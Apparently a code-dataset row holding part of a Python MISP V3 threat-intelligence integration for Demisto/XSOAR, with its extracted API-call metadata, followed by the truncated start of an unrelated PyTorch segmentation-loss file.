re.MULTILINE)\n\n is_complex_and_operator = is_misp_complex_search_helper(match_and, misp_query_params, 'and_parameters')\n is_complex_or_operator = is_misp_complex_search_helper(match_or, misp_query_params, 'or_parameters')\n is_complex_not_operator = is_misp_complex_search_helper(match_not, misp_query_params, 'not_parameters')\n is_complex_search = is_complex_and_operator or is_complex_or_operator or is_complex_not_operator\n if is_complex_search:\n return PYMISP.build_complex_query(**misp_query_params)\n return demisto_query\n\n\ndef is_misp_complex_search_helper(match_operator, misp_query_params, operator_key):\n is_complex_search = False\n if match_operator is not None:\n misp_query_params[operator_key] = match_operator.group(2).split(',')\n is_complex_search = True\n return is_complex_search\n\n\ndef prepare_args_to_search(controller):\n demisto_args = demisto.args()\n args_to_misp_format = {arg: demisto_args[arg] for arg in MISP_SEARCH_ARGUMENTS if arg in demisto_args}\n # Replacing keys and values from Demisto to Misp's keys\n if 'type' in args_to_misp_format:\n args_to_misp_format['type_attribute'] = args_to_misp_format.pop('type')\n if 'to_ids' in args_to_misp_format:\n args_to_misp_format['to_ids'] = 1 if demisto_args.get('to_ids') == 'true' else 0\n if 'from' in args_to_misp_format:\n args_to_misp_format['date_from'] = args_to_misp_format.pop('from')\n if 'to' in args_to_misp_format:\n args_to_misp_format['date_to'] = args_to_misp_format.pop('to')\n if 'event_id' in args_to_misp_format:\n args_to_misp_format['eventid'] = argToList(args_to_misp_format.pop('event_id'))\n if 'last' in args_to_misp_format:\n args_to_misp_format['publish_timestamp'] = args_to_misp_format.pop('last')\n if 'include_decay_score' in args_to_misp_format:\n args_to_misp_format['include_decay_score'] = 1 if demisto_args.get('include_decay_score') == 'true' else 0\n if 'include_sightings' in args_to_misp_format:\n args_to_misp_format['include_sightings'] = 1 if demisto_args.get('include_sightings') == 'true' else 0\n if 'include_correlations' in args_to_misp_format:\n args_to_misp_format['include_correlations'] = 1 if demisto_args.get('include_correlations') == 'true' else 0\n if 'enforceWarninglist' in args_to_misp_format:\n args_to_misp_format['enforceWarninglist'] = 1 if demisto_args.get('enforceWarninglist') == 'true' else 0\n if 'include_feed_correlations' in args_to_misp_format:\n args_to_misp_format['includeFeedCorrelations'] = 1 if demisto_args.get(\n 'include_feed_correlations') == 'true' else 0\n args_to_misp_format.pop('include_feed_correlations')\n if 'limit' not in args_to_misp_format:\n args_to_misp_format['limit'] = '50'\n if 'tags' in args_to_misp_format:\n args_to_misp_format['tags'] = build_misp_complex_filter(args_to_misp_format['tags'])\n args_to_misp_format['controller'] = controller\n demisto.debug(f\"[MISP V3]: args for {demisto.command()} command are {args_to_misp_format}\")\n return args_to_misp_format\n\n\ndef build_attributes_search_response(response: Union[dict, requests.Response],\n include_correlations=False) -> dict:\n \"\"\"\n Convert the response of attribute search returned from MISP to the context output format.\n \"\"\"\n response_object = copy.deepcopy(response)\n if include_correlations:\n # return full related attributes only if the user wants to get them back\n ATTRIBUTE_FIELDS.append('RelatedAttribute')\n\n if isinstance(response_object, str):\n response_object = json.loads(json.dumps(response_object))\n attributes = response_object.get('Attribute')\n return get_limit_attribute_search_outputs(attributes)\n\n\ndef get_limit_attribute_search_outputs(attributes):\n for i in range(len(attributes)):\n attributes[i] = {key: attributes[i].get(key) for key in ATTRIBUTE_FIELDS if key in attributes[i]}\n build_galaxy_output(attributes[i])\n build_tag_output(attributes[i])\n build_sighting_output_from_attribute_search_response(attributes[i])\n convert_timestamp_to_readable(attributes[i], None)\n formatted_attributes = replace_keys_from_misp_to_context_data(attributes)\n return formatted_attributes\n\n\ndef build_galaxy_output(given_object):\n \"\"\"given_object is attribute or event, depends on the called function\"\"\"\n if given_object.get('Galaxy'):\n given_object['Galaxy'] = [\n {\n 'name': star.get('name'),\n 'type': star.get('type'),\n 'description': star.get('description')\n } for star in given_object['Galaxy']\n ]\n\n\ndef build_object_output(event):\n if event.get('Object'):\n event['Object'] = [\n {\n 'name': event_object.get('name'),\n 'uuid': event_object.get('uuid'),\n 'description': event_object.get('description'),\n 'id': event_object.get('id')\n } for event_object in event['Object']\n ]\n\n\ndef build_tag_output(given_object):\n \"\"\"given_object is attribute or event, depends on the called function\"\"\"\n if given_object.get('Tag'):\n given_object['Tag'] = [\n {'Name': tag.get('name'),\n 'is_galaxy': tag.get('is_galaxy')\n } for tag in given_object.get('Tag')\n ]\n\n\ndef build_sighting_output_from_attribute_search_response(attribute):\n if attribute.get('Sighting'):\n attribute['Sighting'] = [\n {'type': sighting.get('type')\n } for sighting in attribute.get('Sighting')\n ]\n\n\ndef build_attributes_search_response_return_only_values(response_object: Union[dict, requests.Response]) -> list:\n \"\"\"returns list of attributes' values that match the search query when user set the arg 'compact' to True\"\"\"\n if isinstance(response_object, str):\n response_object = json.loads(json.dumps(response_object))\n attributes = response_object.get('Attribute')\n return [attribute.get('value') for attribute in attributes]\n\n\ndef pagination_args_validation(page, limit):\n if page and page < 0:\n raise DemistoException(\"page should be zero or a positive number\")\n if limit and limit < 0:\n raise DemistoException(\"limit should be zero or a positive number\")\n\n\ndef attribute_response_to_markdown_table(response: dict):\n attribute_highlights = []\n for attribute in response:\n event = attribute.get('Event', {})\n attribute_tags = [tag.get('Name') for tag in attribute.get('Tag')] if attribute.get(\n 'Tag') else None\n attribute_sightings = [SIGHTING_TYPE_ID_TO_NAME[sighting.get('Type')] for sighting in\n attribute.get('Sighting')] if attribute.get('Sighting') else None\n attribute_highlights.append({\n 'Attribute ID': attribute.get('ID'),\n 'Event ID': attribute.get('EventID'),\n 'Attribute Category': attribute.get('Category'),\n 'Attribute Type': attribute.get('Type'),\n 'Attribute Comment': attribute.get('Comment'),\n 'Attribute Value': attribute.get('Value'),\n 'Attribute Tags': attribute_tags,\n 'Attribute Sightings': attribute_sightings,\n 'To IDs': attribute.get('ToIDs'),\n 'Timestamp': attribute.get('Timestamp'),\n 'Event Info': event.get('Info'),\n 'Event Organization ID': event.get('OrganizationID'),\n 'Event Distribution': event.get('Distribution'),\n 'Event UUID': event.get('UUID')\n })\n return attribute_highlights\n\n\ndef search_attributes(demisto_args: dict) -> CommandResults:\n \"\"\"Execute a MISP search over 'attributes'\"\"\"\n args = prepare_args_to_search('attributes')\n outputs_should_include_only_values = argToBoolean(demisto_args.get('compact', False))\n include_correlations = argToBoolean(demisto_args.get('include_correlations', False))\n page = arg_to_number(demisto_args.get('page', 1), \"page\", required=True)\n limit = arg_to_number(demisto_args.get('limit', 50), \"limit\", required=True)\n pagination_args_validation(page, limit)\n\n response = PYMISP.search(**args)\n if response:\n if outputs_should_include_only_values:\n response_for_context = build_attributes_search_response_return_only_values(response)\n number_of_results = len(response_for_context)\n md = tableToMarkdown(f\"MISP search-attributes returned {number_of_results} attributes\",\n response_for_context[:number_of_results], [\"Value\"])\n else:\n response_for_context = build_attributes_search_response(response, include_correlations)\n attribute_highlights = attribute_response_to_markdown_table(response_for_context)\n\n pagination_message = f\"Current page size: {limit}\\n\"\n if len(response_for_context) == limit:\n pagination_message += f\"Showing page {page} out others that may exist\"\n else:\n pagination_message += f\"Showing page {page}\"\n md = tableToMarkdown(\n f\"MISP search-attributes returned {len(response_for_context)} attributes\\n {pagination_message}\",\n attribute_highlights, removeNull=True)\n\n return CommandResults(\n raw_response=response,\n readable_output=md,\n outputs=response_for_context,\n outputs_prefix=\"MISP.Attribute\",\n outputs_key_field=\"ID\"\n )\n else:\n return CommandResults(readable_output=f\"No attributes found in MISP for the given filters: {args}\")\n\n\ndef build_events_search_response(response: Union[dict, requests.Response]) -> dict:\n \"\"\"\n Convert the response of event search returned from MISP to the context output format.\n please note: attributes are excluded from search-events output as the information is too big. User can use the\n command search-attributes in order to get the information about the attributes.\n \"\"\"\n response_object = copy.deepcopy(response)\n if isinstance(response_object, str):\n response_object = json.loads(json.dumps(response_object))\n events = [event.get('Event') for event in response_object]\n for i in range(0, len(events)):\n # Filter object from keys in event_args\n events[i] = {key: events[i].get(key) for key in EVENT_FIELDS if key in events[i]}\n events[i]['RelatedEvent'] = [] # there is no need in returning related event when searching for an event\n build_galaxy_output(events[i])\n build_tag_output(events[i])\n build_object_output(events[i])\n events[i]['timestamp'] = misp_convert_timestamp_to_date_string(events[i].get('timestamp'))\n events[i]['publish_timestamp'] = misp_convert_timestamp_to_date_string(events[i].get('publish_timestamp'))\n\n formatted_events = replace_keys_from_misp_to_context_data(events) # type: ignore\n return formatted_events # type: ignore\n\n\ndef event_to_human_readable_tag_list(event):\n event_tags = event.get('Tag', [])\n if event_tags:\n return [tag.get('Name') for tag in event_tags]\n\n\ndef event_to_human_readable_galaxy_list(event):\n event_galaxies = event.get('Galaxy', [])\n if event_galaxies:\n return [galaxy.get('Name') for galaxy in event.get('Galaxy')]\n\n\ndef event_to_human_readable_object_list(event):\n event_objects = event.get('Object', [])\n if event_objects:\n return [event_object.get('ID') for event_object in event.get('Object')]\n\n\ndef event_to_human_readable(response: dict):\n event_highlights = []\n for event in response:\n event_tags = event_to_human_readable_tag_list(event)\n event_galaxies = event_to_human_readable_galaxy_list(event)\n event_objects = event_to_human_readable_object_list(event)\n event_highlights.append({\n 'Event ID': event.get('ID'),\n 'Event Tags': event_tags,\n 'Event Galaxies': event_galaxies,\n 'Event Objects': event_objects,\n 'Publish Timestamp': event.get('PublishTimestamp'),\n 'Event Info': event.get('Info'),\n 'Event Org ID': event.get('OrganizationID'),\n 'Event Orgc ID': event.get('OwnerOrganization.ID'),\n 'Event Distribution': event.get('Distribution'),\n 'Event UUID': event.get('UUID'),\n })\n return event_highlights\n\n\ndef search_events(demisto_args: dict) -> CommandResults:\n \"\"\"\n Execute a MISP search using the 'event' controller.\n \"\"\"\n args = prepare_args_to_search('events')\n page = arg_to_number(demisto_args.get('page', 1), \"page\", required=True)\n limit = arg_to_number(demisto_args.get('limit', 50), \"limit\", required=True)\n pagination_args_validation(page, limit)\n\n response = PYMISP.search(**args)\n if response:\n response_for_context = build_events_search_response(response)\n event_outputs_to_human_readable = event_to_human_readable(response_for_context)\n\n pagination_message = f\"Current page size: {limit}\\n\"\n if len(response_for_context) == limit:\n pagination_message += f\"Showing page {page} out others that may exist\"\n else:\n pagination_message += f\"Showing page {page}\"\n md = tableToMarkdown(\n f\"MISP search-events returned {len(response_for_context)} events.\\n {pagination_message}\",\n event_outputs_to_human_readable, removeNull=True)\n\n return CommandResults(\n raw_response=response,\n readable_output=md,\n outputs=response_for_context,\n outputs_prefix=\"MISP.Event\",\n outputs_key_field=\"ID\"\n )\n else:\n return CommandResults(readable_output=f\"No events found in MISP for the given filters: {args}\")\n\n\ndef delete_event(demisto_args: dict):\n \"\"\"\n Gets an event id and deletes it.\n \"\"\"\n event_id = demisto_args.get('event_id')\n response = PYMISP.delete_event(event_id)\n if 'errors' in response:\n raise DemistoException(f'Event ID: {event_id} has not found in MISP: \\nError message: {response}')\n else:\n human_readable = f'Event {event_id} has been deleted'\n return CommandResults(readable_output=human_readable, raw_response=response)\n\n\ndef add_tag(demisto_args: dict, is_attribute=False):\n \"\"\"\n Function will add tag to given UUID of event or attribute.\n is_attribute (bool): if the given UUID belongs to an attribute (True) or event (False).\n \"\"\"\n uuid = demisto_args.get('uuid')\n tag = demisto_args.get('tag')\n try:\n PYMISP.tag(uuid, tag) # add the tag\n except PyMISPError:\n raise DemistoException(\"Adding the required tag was failed. Please make sure the UUID exists.\")\n if is_attribute:\n response = PYMISP.search(uuid=uuid, controller='attributes')\n human_readable = f'Tag {tag} has been successfully added to attribute {uuid}'\n return CommandResults(\n readable_output=human_readable,\n outputs_prefix='MISP.Attribute',\n outputs_key_field='ID',\n outputs=build_attributes_search_response(response),\n raw_response=response\n )\n\n # event's uuid\n response = PYMISP.search(uuid=uuid)\n human_readable = f'Tag {tag} has been successfully added to event {uuid}'\n return CommandResults(\n readable_output=human_readable,\n outputs_prefix='MISP.Event',\n outputs_key_field='ID',\n outputs=build_events_search_response(response),\n raw_response=response\n )\n\n\ndef remove_tag(demisto_args: dict, is_attribute=False):\n \"\"\"\n Function will remove tag to given UUID of event or attribute.\n is_attribute (bool): if the given UUID is an attribute's one. Otherwise it's event's.\n \"\"\"\n uuid = demisto_args.get('uuid')\n tag = demisto_args.get('tag')\n try:\n response = PYMISP.untag(uuid, tag)\n if response and response.get('errors'):\n raise DemistoException(f'Error in `{demisto.command()}` command: {response}')\n except PyMISPError:\n raise DemistoException(\"Removing the required tag was failed. Please make sure the UUID and tag exist.\")\n\n if is_attribute:\n response = PYMISP.search(uuid=uuid, controller='attributes')\n human_readable = f'Tag {tag} has been successfully removed from the attribute {uuid}'\n return CommandResults(\n readable_output=human_readable,\n outputs_prefix='MISP.Attribute',\n outputs_key_field='ID',\n outputs=build_attributes_search_response(response),\n raw_response=response\n )\n # event's uuid\n response = PYMISP.search(uuid=uuid)\n human_readable = f'Tag {tag} has been successfully removed from the event {uuid}'\n return CommandResults(\n readable_output=human_readable,\n outputs_prefix='MISP.Event',\n outputs_key_field='ID',\n outputs=build_events_search_response(response),\n raw_response=response\n )\n\n\ndef add_sighting(demisto_args: dict):\n \"\"\"Adds sighting to MISP attribute\n \"\"\"\n attribute_id = demisto_args.get('id')\n attribute_uuid = demisto_args.get('uuid')\n sighting_type = demisto_args['type'] # mandatory arg\n att_id = attribute_id or attribute_uuid\n if not att_id:\n raise DemistoException('ID or UUID not specified')\n sighting_args = {\n 'id': attribute_id,\n 'uuid': attribute_uuid,\n 'type': SIGHTING_TYPE_NAME_TO_ID[sighting_type]\n }\n sigh_obj = MISPSighting()\n sigh_obj.from_dict(**sighting_args)\n response = PYMISP.add_sighting(sigh_obj, att_id)\n if response.get('message'):\n raise DemistoException(f\"An error was occurred: {response.get('message')}\")\n elif response.get('Sighting'):\n human_readable = f'Sighting \\'{sighting_type}\\' has been successfully added to attribute {att_id}'\n return CommandResults(readable_output=human_readable)\n raise DemistoException(f\"An error was occurred: {json.dumps(response)}\")\n\n\ndef test(malicious_tag_ids, suspicious_tag_ids, attributes_limit):\n \"\"\"\n Test module.\n \"\"\"\n is_tag_list_valid(malicious_tag_ids)\n is_tag_list_valid(suspicious_tag_ids)\n if attributes_limit < 0:\n raise DemistoException('Attribute limit has to be a positive number.')\n response = PYMISP._prepare_request('GET', 'servers/getPyMISPVersion.json')\n if PYMISP._check_json_response(response):\n return 'ok'\n else:\n raise DemistoException('MISP has not connected.')\n\n\ndef build_feed_url(demisto_args):\n url = demisto_args.get('feed')\n url = url[:-1] if url.endswith('/') else url\n if PREDEFINED_FEEDS.get(url):\n url = PREDEFINED_FEEDS[url].get('url') # type: ignore\n return url\n\n\ndef add_events_from_feed(demisto_args: dict, use_ssl: bool, proxies: dict):\n \"\"\"Gets an OSINT feed from url and publishing them to MISP\n urls with feeds for example: https://www.misp-project.org/feeds/\n feed format must be MISP.\n \"\"\"\n headers = {'Accept': 'application/json'}\n url = build_feed_url(demisto_args)\n osint_url = f'{url}/manifest.json'\n limit = arg_to_number(demisto_args.get('limit', 2), \"limit\", required=True)\n try:\n uri_list = requests.get(osint_url, verify=use_ssl, headers=headers, proxies=proxies).json()\n events_ids = list() # type: List[Dict[str, int]]\n for index, uri in enumerate(uri_list, 1):\n response = requests.get(f'{url}/{uri}.json', verify=use_ssl, headers=headers, proxies=proxies).json()\n misp_new_event = MISPEvent()\n misp_new_event.load(response)\n add_event_response = PYMISP.add_event(misp_new_event)\n event_object = add_event_response.get('Event')\n if event_object and 'id' in event_object:\n events_ids.append({'ID': event_object['id']})\n if limit == len(events_ids):\n break\n human_readable = tableToMarkdown(f'Total of {len(events_ids)} events was added to MISP.', events_ids)\n return CommandResults(\n readable_output=human_readable,\n outputs_prefix='MISP.Event',\n outputs_key_field='ID',\n outputs=events_ids,\n )\n except ValueError as e:\n raise DemistoException(f'URL [{url}] is not a valid MISP feed. error: {e}')\n\n\ndef add_object(event_id: str, obj: MISPObject):\n \"\"\"Sending object to MISP and returning outputs\n\n Args:\n obj: object to add to MISP\n event_id: ID of event\n \"\"\"\n response = PYMISP.add_object(event_id, misp_object=obj)\n if 'errors' in response:\n raise DemistoException(f'Error in `{demisto.command()}` command: {response}')\n for ref in obj.ObjectReference:\n response = PYMISP.add_object_reference(ref)\n for attribute in response.get('Object', {}).get('Attribute', []):\n convert_timestamp_to_readable(attribute, None)\n response['Object']['timestamp'] = misp_convert_timestamp_to_date_string(response.get('Object', {}).get('timestamp'))\n formatted_response = replace_keys_from_misp_to_context_data(response)\n formatted_response.update({\"ID\": event_id})\n\n human_readable = f'Object has been added to MISP event ID {event_id}'\n return CommandResults(\n readable_output=human_readable,\n outputs_prefix='MISP.Event',\n outputs_key_field='ID',\n outputs=formatted_response,\n )\n\n\ndef add_file_object(demisto_args: dict):\n entry_id = demisto_args.get('entry_id')\n event_id = demisto_args.get('event_id')\n file_path = demisto.getFilePath(entry_id).get('path')\n obj = FileObject(file_path)\n return add_object(event_id, obj)\n\n\ndef add_domain_object(demisto_args: dict):\n \"\"\"Adds a domain object to MISP\n domain-ip description: https://www.misp-project.org/objects.html#_domain_ip\n \"\"\"\n text = demisto_args.get('text')\n event_id = demisto_args.get('event_id')\n domain = demisto_args.get('name')\n obj = MISPObject('domain-ip')\n ips = argToList(demisto_args.get('ip'))\n for ip in ips:\n obj.add_attribute('ip', value=ip)\n obj.add_attribute('domain', value=domain)\n if text:\n obj.add_attribute('text', value=text)\n return add_object(event_id, obj)\n\n\ndef add_url_object(demisto_args: dict):\n \"\"\"Building url object in MISP scheme\n Scheme described https://www.misp-project.org/objects.html#_url\n \"\"\"\n url_args = [\n 'text',\n 'last_seen',\n 'first_seen'\n ]\n event_id = demisto_args.get('event_id')\n url = demisto_args.get('url')\n url_parse = urlparse(url)\n url_obj = [{'url': url}]\n url_obj.extend({'scheme': url_parse.scheme}) if url_parse.scheme else None\n url_obj.append({'resource_path': url_parse.path}) if url_parse.path else None\n url_obj.append({'query_string': url_parse.query}) if url_parse.query else None\n url_obj.append({'domain': url_parse.netloc}) if url_parse.netloc else None\n url_obj.append({'fragment': url_parse.fragment}) if url_parse.fragment else None\n url_obj.append({'port': url_parse.port}) if url_parse.port else None\n url_obj.append(\n {'credential': (url_parse.username, url_parse.password)}) if url_parse.username and url_parse.password else None\n url_obj.extend(convert_arg_to_misp_args(demisto_args, url_args))\n\n g_object = build_generic_object('url', url_obj)\n return add_object(event_id, g_object)\n\n\ndef add_generic_object_command(demisto_args: dict):\n event_id = demisto_args.get('event_id')\n template = demisto_args.get('template')\n attributes = demisto_args.get('attributes').replace(\"'\", '\"')\n try:\n args = json.loads(attributes)\n if not isinstance(args, list):\n args = dict_to_generic_object_format(args)\n obj = build_generic_object(template, args)\n return add_object(event_id, obj)\n except ValueError as e:\n raise DemistoException(\n f'`attribute` parameter could not be decoded, may not a valid JSON\\nattribute: {attributes}', str(e))\n\n\ndef convert_arg_to_misp_args(demisto_args, args_names):\n return [{arg.replace('_', '-'): demisto_args.get(arg)} for arg in args_names if demisto_args.get(arg)]\n\n\ndef add_ip_object(demisto_args: dict):\n event_id = demisto_args.get('event_id')\n ip_object_args = [\n 'dst_port',\n 'src_port',\n 'domain',\n 'hostname',\n 'ip_src',\n 'ip_dst'\n ]\n # converting args to MISP's arguments types\n misp_attributes_args = convert_arg_to_misp_args(demisto_args, ip_object_args)\n ips = argToList(demisto_args.get('ip'))\n for ip in ips:\n misp_attributes_args.append({'ip': ip})\n if misp_attributes_args:\n non_req_args = [\n 'first_seen',\n 'last_seen',\n ]\n misp_attributes_args.extend(convert_arg_to_misp_args(demisto_args, non_req_args))\n misp_attributes_args.append({'text': demisto_args.get('comment')}) if demisto_args.get('comment') else None\n obj = build_generic_object('ip-port', misp_attributes_args)\n return add_object(event_id, obj)\n else:\n raise DemistoException(\n f'None of required arguments presents. command {demisto.command()} requires one of {ip_object_args}')\n\n\ndef handle_tag_duplication_ids(malicious_tag_ids, suspicious_tag_ids):\n \"\"\"\n Gets 2 sets which include tag ids. If there is an id that exists in both sets, it will be removed from the\n suspicious tag ids set and will be stayed only in the malicious one (as a tag that was configured to be malicious is\n stronger than recognised as suspicious).\n \"\"\"\n common_ids = set(malicious_tag_ids) & set(suspicious_tag_ids)\n suspicious_tag_ids = {tag_id for tag_id in suspicious_tag_ids if tag_id not in common_ids}\n return malicious_tag_ids, suspicious_tag_ids\n\n\ndef is_tag_list_valid(tag_ids):\n \"\"\"Gets a list ot tag ids (each one is str), and verify all the tags are valid positive integers.\"\"\"\n for tag in tag_ids:\n try:\n tag = int(tag)\n if tag <= 0:\n raise DemistoException(f\"Tag id has to be a positive integer, please change the given: '{tag}' id.\")\n except ValueError:\n raise DemistoException(f\"Tag id has to be a positive integer, please change the given: '{tag}' id.\")\n\n\ndef create_updated_attribute_instance(demisto_args: dict, attribute_uuid: str) -> MISPAttribute:\n attribute_type = demisto_args.get('type')\n distribution = demisto_args.get('distribution')\n category = demisto_args.get('category')\n comment = demisto_args.get('comment')\n value = demisto_args.get('value')\n first_seen = demisto_args.get('first_seen')\n last_seen = demisto_args.get('last_seen')\n\n attribute_instance = MISPAttribute()\n attribute_instance.uuid = attribute_uuid\n if attribute_type:\n attribute_instance.type = attribute_type\n if distribution:\n attribute_instance.distribution = MISP_DISTRIBUTION_TO_IDS[distribution]\n if category:\n attribute_instance.category = category\n if value:\n attribute_instance.value = value\n if comment:\n attribute_instance.comment = comment\n if first_seen:\n attribute_instance.first_seen = first_seen\n if last_seen:\n attribute_instance.last_seen = last_seen\n return attribute_instance\n\n\ndef update_attribute_command(demisto_args: dict) -> CommandResults:\n attribute_uuid = demisto_args.get('attribute_uuid')\n attribute_instance = create_updated_attribute_instance(demisto_args, attribute_uuid)\n attribute_instance_response = PYMISP.update_attribute(attribute=attribute_instance, attribute_id=attribute_uuid)\n if isinstance(attribute_instance_response, dict) and attribute_instance_response.get('errors'):\n raise DemistoException(attribute_instance_response.get('errors'))\n\n human_readable = f\"## MISP update attribute\\nAttribute: {attribute_uuid} was updated.\\n\"\n attribute = attribute_instance_response.get('Attribute')\n convert_timestamp_to_readable(attribute, None)\n parsed_attribute_data = replace_keys_from_misp_to_context_data(attribute)\n\n return CommandResults(\n readable_output=human_readable,\n outputs_prefix='MISP.Attribute',\n outputs_key_field='ID',\n outputs=parsed_attribute_data,\n )\n\n\ndef main():\n params = demisto.params()\n malicious_tag_ids = argToList(params.get('malicious_tag_ids'))\n suspicious_tag_ids = argToList(params.get('suspicious_tag_ids'))\n reliability = params.get('integrationReliability', 'B - Usually reliable')\n if DBotScoreReliability.is_valid_type(reliability):\n reliability = DBotScoreReliability.get_dbot_score_reliability_from_str(reliability)\n else:\n Exception(\"MISP V3 error: Please provide a valid value for the Source Reliability parameter\")\n attributes_limit = arg_to_number(params.get('attributes_limit', 20), \"attributes_limit\", required=True)\n command = demisto.command()\n demisto.debug(f'[MISP V3]: command is {command}')\n args = demisto.args()\n\n try:\n\n malicious_tag_ids, suspicious_tag_ids = handle_tag_duplication_ids(malicious_tag_ids, suspicious_tag_ids)\n if command == 'test-module':\n return_results(test(malicious_tag_ids=malicious_tag_ids, suspicious_tag_ids=suspicious_tag_ids,\n attributes_limit=attributes_limit))\n elif command == 'misp-create-event':\n return_results(create_event_command(args))\n elif command == 'misp-add-attribute':\n return_results(add_attribute(demisto_args=args))\n elif command == 'misp-search-events':\n return_results(search_events(args))\n elif command == 'misp-search-attributes':\n return_results(search_attributes(args))\n elif command == 'misp-delete-event':\n return_results(delete_event(args))\n elif command == 'misp-add-sighting':\n return_results(add_sighting(args))\n elif command == 'misp-add-tag-to-event':\n return_results(add_tag(args))\n elif command == 'misp-add-tag-to-attribute':\n return_results(add_tag(demisto_args=args, is_attribute=True))\n elif command == 'misp-remove-tag-from-event':\n return_results(remove_tag(args))\n elif command == 'misp-remove-tag-from-attribute':\n return_results(remove_tag(demisto_args=args, is_attribute=True))\n elif command == 'misp-add-events-from-feed':\n return_results(add_events_from_feed(demisto_args=args, use_ssl=VERIFY, proxies=PROXIES))\n elif command == 'file':\n return_results(\n generic_reputation_command(args, 'file', 'FILE', malicious_tag_ids, suspicious_tag_ids, reliability,\n attributes_limit))\n elif command == 'url':\n return_results(\n generic_reputation_command(args, 'url', 'URL', malicious_tag_ids, suspicious_tag_ids, reliability,\n attributes_limit))\n elif command == 'ip':\n return_results(\n generic_reputation_command(args, 'ip', 'IP', malicious_tag_ids, suspicious_tag_ids, reliability,\n attributes_limit))\n elif command == 'domain':\n return_results(\n generic_reputation_command(args, 'domain', 'DOMAIN', malicious_tag_ids, suspicious_tag_ids,\n reliability, attributes_limit))\n elif command == 'email':\n return_results(generic_reputation_command(args, 'email', 'EMAIL', malicious_tag_ids, suspicious_tag_ids,\n reliability, attributes_limit))\n elif command == 'misp-add-file-object':\n return_results(add_file_object(args))\n elif command == 'misp-add-domain-object':\n return_results(add_domain_object(args))\n elif command == 'misp-add-url-object':\n return_results(add_url_object(args))\n elif command == 'misp-add-ip-object':\n return_results(add_ip_object(args))\n elif command == 'misp-add-object':\n return_results(add_generic_object_command(args))\n elif command == 'misp-update-attribute':\n return_results(update_attribute_command(args))\n except PyMISPError as e:\n return_error(e.message)\n except Exception as e:\n return_error(str(e))\n\n\nif __name__ in ['__main__', '__builtin__', 'builtins']:\n main()\n"},"apis":{"kind":"list like","value":["pymisp.tools.FileObject","pymisp.tools.GenericObjectGenerator","urllib.parse.urlparse","urllib3.disable_warnings","pymisp.MISPEvent","pymisp.ExpandedPyMISP","copy.deepcopy","pymisp.MISPObject","pymisp.MISPAttribute","pymisp.MISPSighting"],"string":"[\n \"pymisp.tools.FileObject\",\n \"pymisp.tools.GenericObjectGenerator\",\n \"urllib.parse.urlparse\",\n \"urllib3.disable_warnings\",\n \"pymisp.MISPEvent\",\n \"pymisp.ExpandedPyMISP\",\n \"copy.deepcopy\",\n \"pymisp.MISPObject\",\n \"pymisp.MISPAttribute\",\n \"pymisp.MISPSighting\"\n]"},"extract_api":{"kind":"string","value":"[((1129, 1155), 'urllib3.disable_warnings', 'urllib3.disable_warnings', ([], {}), '()\\n', (1153, 1155), False, 'import urllib3\\n'), ((1584, 1659), 'pymisp.ExpandedPyMISP', 'ExpandedPyMISP', ([], {'url': 'MISP_URL', 'key': 'MISP_API_KEY', 'ssl': 'VERIFY', 'proxies': 'PROXIES'}), '(url=MISP_URL, key=MISP_API_KEY, ssl=VERIFY, proxies=PROXIES)\\n', (1598, 1659), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\\n'), ((7707, 7744), 'pymisp.tools.GenericObjectGenerator', 'GenericObjectGenerator', (['template_name'], {}), '(template_name)\\n', (7729, 7744), False, 'from pymisp.tools import GenericObjectGenerator\\n'), ((12553, 12581), 'copy.deepcopy', 'copy.deepcopy', (['misp_response'], {}), '(misp_response)\\n', (12566, 12581), False, 'import copy\\n'), ((17464, 17475), 'pymisp.MISPEvent', 'MISPEvent', ([], {}), '()\\n', (17473, 17475), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\\n'), ((33799, 33822), 'copy.deepcopy', 'copy.deepcopy', (['response'], {}), '(response)\\n', (33812, 33822), False, 'import copy\\n'), ((40516, 40539), 'copy.deepcopy', 'copy.deepcopy', (['response'], {}), '(response)\\n', (40529, 40539), False, 'import copy\\n'), ((47985, 47999), 'pymisp.MISPSighting', 'MISPSighting', ([], {}), '()\\n', (47997, 47999), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\\n'), ((52082, 52103), 'pymisp.tools.FileObject', 'FileObject', (['file_path'], {}), '(file_path)\\n', (52092, 52103), False, 'from pymisp.tools import FileObject\\n'), ((52438, 52461), 'pymisp.MISPObject', 'MISPObject', (['\"\"\"domain-ip\"\"\"'], {}), \"('domain-ip')\\n\", (52448, 52461), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\\n'), ((53044, 53057), 'urllib.parse.urlparse', 'urlparse', (['url'], {}), '(url)\\n', (53052, 53057), False, 'from urllib.parse import urlparse\\n'), ((57209, 57224), 'pymisp.MISPAttribute', 'MISPAttribute', ([], {}), '()\\n', (57222, 57224), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\\n'), ((50039, 50050), 'pymisp.MISPEvent', 'MISPEvent', ([], {}), '()\\n', (50048, 50050), False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\\n')]"}}},{"rowIdx":719,"cells":{"code":{"kind":"string","value":"import torch\nfrom torch.nn import functional as F\nfrom torch import nn\nfrom torch.autograd import Variable\n\nfrom adet.utils.comm import compute_locations, aligned_bilinear\n\ndef dice_coefficient(x, target):\n eps = 1e-5\n n_inst = x.size(0)\n x = x.reshape(n_inst, -1)\n target = target.reshape(n_inst, -1)\n intersection = (x * target).sum(dim=1)\n union = (x ** 2.0).sum(dim=1) + (target ** 2.0).sum(dim=1) + eps\n loss = 1. - (2 * intersection / union)\n return loss\n\ndef lovasz_grad(gt_sorted):\n \"\"\"\n Computes gradient of the Lovasz extension w.r.t sorted errors\n See Alg. 1 in paper\n \"\"\"\n p = len(gt_sorted)\n gts = gt_sorted.sum()\n intersection = gts - gt_sorted.float().cumsum(0)\n union = gts + (1 - gt_sorted.float()).cumsum(0)\n jaccard = 1. - intersection / union\n if p > 1: # cover 1-pixel case\n jaccard[1:p] = jaccard[1:p] - jaccard[0:-1]\n return jaccard\n\ndef lovasz_hinge(logits, labels):\n \"\"\"\n Binary Lovasz hinge loss\n logits: [P] Variable, logits at each prediction (between -\\infty and +\\infty)\n labels: [P] Tensor, binary ground truth labels (0 or 1)\n \"\"\"\n if len(labels) == 0:\n # only void 